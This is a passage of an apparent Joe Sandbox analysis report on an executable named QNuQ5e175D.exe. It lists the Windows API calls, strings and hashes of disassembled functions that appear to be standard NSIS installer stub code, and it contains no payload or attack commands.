                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 00405EA8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-4267323751
                                                        • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                        • Instruction ID: f09b3c5ebc87e5286f4ae90cf2a9e4f9baad7a67d9a69d6c991adc66958b5f71
                                                        • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                        • Instruction Fuzzy Hash: 40D05EB28019209ED3226B04EC0499F73A8EF123107868826E980A61A5D7785D818AEC
                                                        Function 00405FCC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FF4
                                                        • CharNextA.USER32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406005
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                        • Instruction ID: b896d6fd3cda69cb85c158c7a33f171d68b8f81fed19edc6c2f6f75b2124ada4
                                                        • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                        • Instruction Fuzzy Hash: 64F0F631104418FFC702DFA5DD00D9EBBA8EF45350B2200B9E841FB250D674DE11AB68

                                                        Non-executed Functions

                                                        Function 00403552 Relevance: 72.2, APIs: 32, Strings: 9, Instructions: 464stringfilecomCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32 ref: 00403575
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004035A0
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004035B3
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040364C
                                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403689
                                                        • OleInitialize.OLE32(00000000), ref: 00403690
                                                        • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 004036AF
                                                        • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036C4
                                                        • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036FD
                                                        • GetTempPathW.KERNEL32(00000400,00441800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403835
                                                        • GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                        • lstrcatW.KERNEL32(00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403852
                                                        • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403866
                                                        • lstrcatW.KERNEL32(00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040386E
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387F
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403887
                                                        • DeleteFileW.KERNEL32(00441000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040389B
                                                        • lstrlenW.KERNEL32(00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403974
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                        • wsprintfW.USER32 ref: 004039D1
                                                        • GetFileAttributesW.KERNEL32(00437800,00441800), ref: 00403A04
                                                        • DeleteFileW.KERNEL32(00437800), ref: 00403A10
                                                        • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 00403A3E
                                                          • Part of subcall function 00406337: MoveFileExW.KERNEL32(?,?,00000005,00405E35,?,00000000,000000F1,?,?,?,?,?), ref: 00406341
                                                        • CopyFileW.KERNEL32(00442800,00437800,00000001,00441800,00000000), ref: 00403A54
                                                          • Part of subcall function 00405B5A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                          • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                          • Part of subcall function 004068D4: FindFirstFileW.KERNEL32(?,0042FAB8,0042F270,00405F97,0042F270,0042F270,00000000,0042F270,0042F270, 4ou,?,00441800,00405CA3,?,756F3420,00441800), ref: 004068DF
                                                          • Part of subcall function 004068D4: FindClose.KERNEL32(00000000), ref: 004068EB
                                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AA2
                                                        • ExitProcess.KERNEL32 ref: 00403ABF
                                                        • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AC6
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AE2
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AE9
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AFE
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B21
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B46
                                                        • ExitProcess.KERNEL32 ref: 00403B69
                                                          • Part of subcall function 00405B25: CreateDirectoryW.KERNEL32(?,00000000,00403545,00441800,00441800,00441800,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                        • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                        • API String ID: 1813718867-2779336553
                                                        • Opcode ID: bbfb8ee3b373486c2b96c0f4544b3db19e0e60a46ad8d454647acdf6da7e114b
                                                        • Instruction ID: 854c728f01c0035939758d15b123b9002cb8995d15bf2fdbd915a0a46deb4321
                                                        • Opcode Fuzzy Hash: bbfb8ee3b373486c2b96c0f4544b3db19e0e60a46ad8d454647acdf6da7e114b
                                                        • Instruction Fuzzy Hash: 6DF1F470604301ABD320AF659D05B6B7EE8EB8570AF10483FF581B22D1DB7DDA458B6E
                                                        Function 00405C83 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileW.KERNEL32(?,?,756F3420,00441800,0043F000), ref: 00405CAC
                                                        • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,756F3420,00441800,0043F000), ref: 00405CF4
                                                        • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,756F3420,00441800,0043F000), ref: 00405D17
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,756F3420,00441800,0043F000), ref: 00405D1D
                                                        • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,756F3420,00441800,0043F000), ref: 00405D2D
                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DCD
                                                        • FindClose.KERNEL32(00000000), ref: 00405DDC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: \*.*$pB
                                                        • API String ID: 2035342205-1006940126
                                                        • Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                        • Instruction ID: 26a84cf893ecfac7fe2d2a8ab9ced37764d13583991ceadb599b2dfedf858990
                                                        • Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                        • Instruction Fuzzy Hash: 8E41B030800A18B6CB21AB65DC4DAAF7778EF42718F10813BF851711D1DB7C4A82DEAE
                                                        Function 0040573B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405799
                                                        • GetDlgItem.USER32(?,000003EE), ref: 004057A8
                                                        • GetClientRect.USER32(?,?), ref: 004057E5
                                                        • GetSystemMetrics.USER32(00000002), ref: 004057EC
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040580D
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040581E
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405831
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040583F
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405852
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405874
                                                        • ShowWindow.USER32(?,00000008), ref: 00405888
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058A9
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004058B9
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058D2
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058DE
                                                        • GetDlgItem.USER32(?,000003F8), ref: 004057B7
                                                          • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058FB
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000056CF,00000000), ref: 00405909
                                                        • CloseHandle.KERNEL32(00000000), ref: 00405910
                                                        • ShowWindow.USER32(00000000), ref: 00405934
                                                        • ShowWindow.USER32(?,00000008), ref: 00405939
                                                        • ShowWindow.USER32(00000008), ref: 00405983
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004059B7
                                                        • CreatePopupMenu.USER32 ref: 004059C8
                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059DC
                                                        • GetWindowRect.USER32(?,?), ref: 004059FC
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405A15
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4D
                                                        • OpenClipboard.USER32(00000000), ref: 00405A5D
                                                        • EmptyClipboard.USER32 ref: 00405A63
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A6F
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405A79
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A8D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405AAD
                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405AB8
                                                        • CloseClipboard.USER32 ref: 00405ABE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: {
                                                        • API String ID: 590372296-366298937
                                                        • Opcode ID: dfead9bfc37cf3db2b35e915a87c725964709008a4f247d6999fb4be6a1ac7a0
                                                        • Instruction ID: d3b07f9c2581fb6b60ef1a2666babd9f8dcdaaa8066b0d43d813b8afd8e95190
                                                        • Opcode Fuzzy Hash: dfead9bfc37cf3db2b35e915a87c725964709008a4f247d6999fb4be6a1ac7a0
                                                        • Instruction Fuzzy Hash: 03B159B0900608FFDF11AF60DD89AAE7B79FB48355F00813AFA45BA1A0C7785A51DF58
                                                        Function 00404F63 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F7B
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404F86
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FD0
                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FE7
                                                        • SetWindowLongW.USER32(?,000000FC,00405570), ref: 00405000
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00405014
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405026
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040503C
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405048
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040505A
                                                        • DeleteObject.GDI32(00000000), ref: 0040505D
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405088
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405094
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040512F
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040515F
                                                          • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405173
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004051A1
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004051AF
                                                        • ShowWindow.USER32(?,00000005), ref: 004051BF
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 004052BA
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040531F
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405334
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405358
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405378
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040538D
                                                        • GlobalFree.KERNEL32(?), ref: 0040539D
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405416
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004054BF
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054CE
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054F9
                                                        • ShowWindow.USER32(?,00000000), ref: 00405547
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405552
                                                        • ShowWindow.USER32(00000000), ref: 00405559
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                        • Instruction ID: 2b71226c2ce540754c325362a134889399d6c5c4637dca841463e5b600fa6882
                                                        • Opcode Fuzzy Hash: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                        • Instruction Fuzzy Hash: 8802AD70900608AFDF20DFA8DD85AAF7BB5FB45314F10817AE611BA2E1D7798A41CF58
                                                        Function 00403FF7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404033
                                                        • ShowWindow.USER32(?), ref: 00404053
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404065
                                                        • ShowWindow.USER32(?,00000004), ref: 0040407E
                                                        • DestroyWindow.USER32 ref: 00404092
                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 004040AB
                                                        • GetDlgItem.USER32(?,?), ref: 004040CA
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040DE
                                                        • IsWindowEnabled.USER32(00000000), ref: 004040E5
                                                        • GetDlgItem.USER32(?,00000001), ref: 00404190
                                                        • GetDlgItem.USER32(?,00000002), ref: 0040419A
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 004041B4
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404205
                                                        • GetDlgItem.USER32(?,00000003), ref: 004042AB
                                                        • ShowWindow.USER32(00000000,?), ref: 004042CC
                                                        • EnableWindow.USER32(?,?), ref: 004042DE
                                                        • EnableWindow.USER32(?,?), ref: 004042F9
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040430F
                                                        • EnableMenuItem.USER32(00000000), ref: 00404316
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040432E
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404341
                                                        • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040436B
                                                        • SetWindowTextW.USER32(?,0042CA68), ref: 0040437F
                                                        • ShowWindow.USER32(?,0000000A), ref: 004044B3
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                        • String ID:
                                                        • API String ID: 1860320154-0
                                                        • Opcode ID: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                        • Instruction ID: 8cad316efbf8f9c89f6feec2797fb874042f4abab253e3557332251604c97906
                                                        • Opcode Fuzzy Hash: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                        • Instruction Fuzzy Hash: C6C1A1B1500204BBDB206F61EE89E2B3AA8FB85755F01453EF751B51F0CB39A8529B2D
                                                        Function 00403C49 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040696B: GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                          • Part of subcall function 0040696B: GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                        • lstrcatW.KERNEL32(00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,756F3420,00441800,00000000,0043F000,00008001), ref: 00403CCA
                                                        • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,756F3420), ref: 00403D4A
                                                        • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D5D
                                                        • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D68
                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403DB1
                                                          • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                        • RegisterClassW.USER32(004336A0), ref: 00403DEE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403E06
                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E3B
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E71
                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E9D
                                                        • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403EAA
                                                        • RegisterClassW.USER32(004336A0), ref: 00403EB3
                                                        • DialogBoxParamW.USER32(?,00000000,00403FF7,00000000), ref: 00403ED2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                        • API String ID: 1975747703-1115850852
                                                        • Opcode ID: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                        • Instruction ID: c722afd28cb3ad108a11d8546cd61d6ece1c23d3a169ae69e987cf65e7f86a01
                                                        • Opcode Fuzzy Hash: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                        • Instruction Fuzzy Hash: 7961C370500700BED620AF66AD46F2B3A6CEB85B5AF40053FF945B22E2DB7C5941CA6D
                                                        Function 004046B5 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404753
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404767
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404784
                                                        • GetSysColor.USER32(?), ref: 00404795
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004047A3
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004047B1
                                                        • lstrlenW.KERNEL32(?), ref: 004047B6
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047C3
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047D8
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404831
                                                        • SendMessageW.USER32(00000000), ref: 00404838
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404863
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004048A6
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004048B4
                                                        • SetCursor.USER32(00000000), ref: 004048B7
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004048D0
